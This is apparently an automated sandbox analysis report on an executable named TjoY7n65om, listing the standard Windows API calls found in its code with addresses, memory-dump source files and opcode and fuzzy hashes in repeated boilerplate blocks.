                                                                                                                          • Opcode Fuzzy Hash: 525bb05d90f4df8801b08e6467920f577611c358328cee9ceb5e9014414f017a
                                                                                                                          • Instruction Fuzzy Hash: 8AF09072600A10DBD31157549D01B6673A8EBD0345F55407FFF84A23E19B7648528B6E
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ShowWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1268545403-0
                                                                                                                          • Opcode ID: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
                                                                                                                          • Instruction ID: 5a19d233efad038c8b2c136f8d26bdd3a0ec8095e28a03ee1255231ebf4f6cbd
                                                                                                                          • Opcode Fuzzy Hash: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
                                                                                                                          • Instruction Fuzzy Hash: 35E04F36B10105ABCB24CBA4ED848AE77A5AB88310764057BE502B32A0CA75AD51CF78
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                            • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                            • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                                                                            • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2547128583-0
                                                                                                                          • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                          • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                                                                          • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                          • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                          • Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
                                                                                                                          • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                          • Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98
                                                                                                                          APIs
                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1375471231-0
                                                                                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                          • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                          • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                                                                          APIs
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 390214022-0
                                                                                                                          • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                          • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                                                          • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                          • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Create
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2289755597-0
                                                                                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                          • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                          • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                                                                          APIs
                                                                                                                          • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PathSearch
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2203818243-0
                                                                                                                          • Opcode ID: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                                                                          • Instruction ID: 264fbd039af9554c7d5279b05a8ebe462d94e5569cecf838bb527c95a897585a
                                                                                                                          • Opcode Fuzzy Hash: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                                                                          • Instruction Fuzzy Hash: FEE0DF72700100EBE710DFA4DE48EAB33A8DF40368B30823AF611B60D1E6B499419B3D
                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3934441357-0
                                                                                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                          • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                          • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                          • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                          • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1096422788-0
                                                                                                                          • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                                          • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                                                                          • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                                          • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,: Completed,?), ref: 00406115
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                          • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                          • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                                                                          APIs
                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                                                                          • Instruction ID: b9fbdb96d3617381fc4168e6aeef7157df6c2fc4641ee643fe61426fbe6ebd08
                                                                                                                          • Opcode Fuzzy Hash: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                                                                          • Instruction Fuzzy Hash: 69D01232B04100DBDB10DBA4AF4899E73A49B44369B304677E502F11D0D6B9D9515A29
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
